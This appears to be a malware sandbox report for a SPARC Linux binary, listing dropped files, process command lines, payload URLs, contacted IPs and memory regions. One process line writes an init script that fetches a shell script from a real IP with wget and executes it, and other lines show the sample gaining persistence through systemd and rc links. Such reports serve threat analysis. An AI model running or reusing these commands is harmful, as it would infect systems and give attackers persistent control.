Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sparc.nn.elf
|
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sparc.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
||
|
/tmp/qemu-open.qwF0jZ (deleted)
|
data
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/sparc.nn.elf
|
/tmp/sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n
/tmp/sparc.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n
*)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf"
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr/s
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
9.33.78.169
|
unknown
|
United States
|
||
|
195.208.182.219
|
unknown
|
Russian Federation
|
||
|
28.70.254.68
|
unknown
|
United States
|
||
|
40.108.225.161
|
unknown
|
United States
|
||
|
51.95.14.30
|
unknown
|
United States
|
||
|
132.57.222.20
|
unknown
|
United States
|
||
|
161.240.122.33
|
unknown
|
United States
|
||
|
158.99.56.141
|
unknown
|
Spain
|
||
|
33.166.38.99
|
unknown
|
United States
|
||
|
49.8.172.31
|
unknown
|
Korea Republic of
|
||
|
215.120.136.136
|
unknown
|
United States
|
||
|
83.20.34.82
|
unknown
|
Poland
|
||
|
106.181.225.172
|
unknown
|
Japan
|
||
|
188.74.214.70
|
unknown
|
Romania
|
||
|
74.120.246.134
|
unknown
|
United States
|
||
|
87.81.4.161
|
unknown
|
United Kingdom
|
||
|
53.210.90.39
|
unknown
|
Germany
|
||
|
185.228.245.179
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
200.148.75.61
|
unknown
|
Brazil
|
||
|
11.164.103.186
|
unknown
|
United States
|
||
|
15.17.153.75
|
unknown
|
United States
|
||
|
70.121.12.70
|
unknown
|
United States
|
||
|
139.80.236.235
|
unknown
|
New Zealand
|
||
|
171.151.208.132
|
unknown
|
United States
|
||
|
120.6.62.252
|
unknown
|
China
|
||
|
170.223.80.198
|
unknown
|
United States
|
||
|
171.124.243.127
|
unknown
|
China
|
||
|
181.47.141.63
|
unknown
|
Argentina
|
||
|
137.109.204.40
|
unknown
|
Australia
|
||
|
33.248.11.83
|
unknown
|
United States
|
||
|
203.31.156.239
|
unknown
|
Australia
|
||
|
78.246.96.46
|
unknown
|
France
|
||
|
117.18.58.175
|
unknown
|
Singapore
|
||
|
189.43.27.5
|
unknown
|
Brazil
|
||
|
76.240.166.49
|
unknown
|
United States
|
||
|
119.169.7.192
|
unknown
|
Japan
|
||
|
102.70.149.13
|
unknown
|
Malawi
|
||
|
80.236.254.51
|
unknown
|
Belgium
|
||
|
15.239.48.129
|
unknown
|
United States
|
||
|
169.24.175.126
|
unknown
|
United States
|
||
|
172.249.137.31
|
unknown
|
United States
|
||
|
104.11.247.191
|
unknown
|
United States
|
||
|
4.93.103.116
|
unknown
|
United States
|
||
|
108.191.65.100
|
unknown
|
United States
|
||
|
8.252.172.161
|
unknown
|
United States
|
||
|
68.144.136.187
|
unknown
|
Canada
|
||
|
134.124.75.249
|
unknown
|
United States
|
||
|
33.153.177.65
|
unknown
|
United States
|
||
|
101.27.113.92
|
unknown
|
China
|
||
|
50.178.43.182
|
unknown
|
United States
|
||
|
179.251.73.120
|
unknown
|
Brazil
|
||
|
189.181.71.203
|
unknown
|
Mexico
|
||
|
128.169.54.96
|
unknown
|
United States
|
||
|
100.154.165.85
|
unknown
|
United States
|
||
|
41.167.100.110
|
unknown
|
South Africa
|
||
|
216.123.128.148
|
unknown
|
Canada
|
||
|
159.199.123.49
|
unknown
|
United States
|
||
|
41.240.169.18
|
unknown
|
Sudan
|
||
|
207.78.239.133
|
unknown
|
United States
|
||
|
206.181.197.5
|
unknown
|
United States
|
||
|
63.117.66.196
|
unknown
|
United States
|
||
|
44.213.56.181
|
unknown
|
United States
|
||
|
54.103.47.113
|
unknown
|
United States
|
||
|
13.13.5.248
|
unknown
|
United States
|
||
|
110.89.201.53
|
unknown
|
China
|
||
|
117.83.134.99
|
unknown
|
China
|
||
|
220.13.132.23
|
unknown
|
Japan
|
||
|
175.106.141.67
|
unknown
|
China
|
||
|
57.191.201.84
|
unknown
|
Belgium
|
||
|
82.115.90.167
|
unknown
|
Poland
|
||
|
196.74.188.47
|
unknown
|
Morocco
|
||
|
64.1.216.169
|
unknown
|
United States
|
||
|
207.210.27.199
|
unknown
|
Canada
|
||
|
124.146.49.219
|
unknown
|
Korea Republic of
|
||
|
9.173.226.173
|
unknown
|
United States
|
||
|
125.5.192.251
|
unknown
|
Philippines
|
||
|
211.3.188.145
|
unknown
|
Japan
|
||
|
173.180.42.128
|
unknown
|
Canada
|
||
|
107.22.109.205
|
unknown
|
United States
|
||
|
58.101.176.64
|
unknown
|
China
|
||
|
150.231.217.219
|
unknown
|
United States
|
||
|
117.186.47.28
|
unknown
|
China
|
||
|
44.92.45.13
|
unknown
|
United States
|
||
|
151.156.203.100
|
unknown
|
Sweden
|
||
|
221.61.188.6
|
unknown
|
Japan
|
||
|
48.200.161.194
|
unknown
|
United States
|
||
|
140.157.176.250
|
unknown
|
United States
|
||
|
8.195.206.69
|
unknown
|
United States
|
||
|
219.115.43.198
|
unknown
|
Japan
|
||
|
57.197.136.169
|
unknown
|
Belgium
|
||
|
175.203.98.13
|
unknown
|
Korea Republic of
|
||
|
217.22.110.141
|
unknown
|
Spain
|
||
|
139.68.174.175
|
unknown
|
United States
|
||
|
157.16.140.3
|
unknown
|
Japan
|
||
|
111.98.33.175
|
unknown
|
Japan
|
||
|
155.4.208.136
|
unknown
|
Norway
|
||
|
191.172.93.23
|
unknown
|
Brazil
|
||
|
70.99.60.178
|
unknown
|
United States
|
||
|
214.157.132.228
|
unknown
|
United States
|
||
|
221.151.202.228
|
unknown
|
Korea Republic of
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fb6ac02d000
|
page execute read
|
|
||
|
7fb6ac02d000
|
page execute read
|
|
||
|
55dbeb0bb000
|
page read and write
|
|||
|
55dbeb0bb000
|
page read and write
|
|||
|
7fb7b374b000
|
page read and write
|
|||
|
7fb7b33db000
|
page read and write
|
|||
|
55dbed0c2000
|
page execute and read and write
|
|||
|
55dbed0d9000
|
page read and write
|
|||
|
7fb6ac03e000
|
page read and write
|
|||
|
7fb7b387c000
|
page read and write
|
|||
|
7fb6ac03e000
|
page read and write
|
|||
|
7fb7ac000000
|
page read and write
|
|||
|
7fb7b374b000
|
page read and write
|
|||
|
7fb7b3019000
|
page read and write
|
|||
|
7fb7ac000000
|
page read and write
|
|||
|
7fb7b3400000
|
page read and write
|
|||
|
55dbee2e9000
|
page read and write
|
|||
|
7fb7b2579000
|
page read and write
|
|||
|
7fb7b38c1000
|
page read and write
|
|||
|
7ffd02cd6000
|
page execute read
|
|||
|
55dbed0c2000
|
page execute and read and write
|
|||
|
7fb7b33db000
|
page read and write
|
|||
|
55dbeae8d000
|
page execute read
|
|||
|
7fb7b3019000
|
page read and write
|
|||
|
7fb7b38c1000
|
page read and write
|
|||
|
7fb7ac021000
|
page read and write
|
|||
|
7fb7b2d7c000
|
page read and write
|
|||
|
7ffd02cd6000
|
page execute read
|
|||
|
55dbeb0c4000
|
page read and write
|
|||
|
55dbeae8d000
|
page execute read
|
|||
|
7fb7b2d8a000
|
page read and write
|
|||
|
7fb7b2d7c000
|
page read and write
|
|||
|
55dbeb0c4000
|
page read and write
|
|||
|
7fb7b2d8a000
|
page read and write
|
|||
|
7fb7b387c000
|
page read and write
|
|||
|
7fb6ac042000
|
page read and write
|
|||
|
7ffd02c2f000
|
page read and write
|
|||
|
7fb7ac021000
|
page read and write
|
|||
|
7ffd02c2f000
|
page read and write
|
|||
|
7fb7b2579000
|
page read and write
|
|||
|
55dbed0d9000
|
page read and write
|
|||
|
7fb7b3874000
|
page read and write
|
|||
|
7fb7b3400000
|
page read and write
|
|||
|
7fb6ac047000
|
page read and write
|
|||
|
55dbee2e9000
|
page read and write
|
|||
|
7fb7b3874000
|
page read and write
|
|||
|
7fb6ac042000
|
page read and write
|
There are 37 hidden memdumps, click here to show them.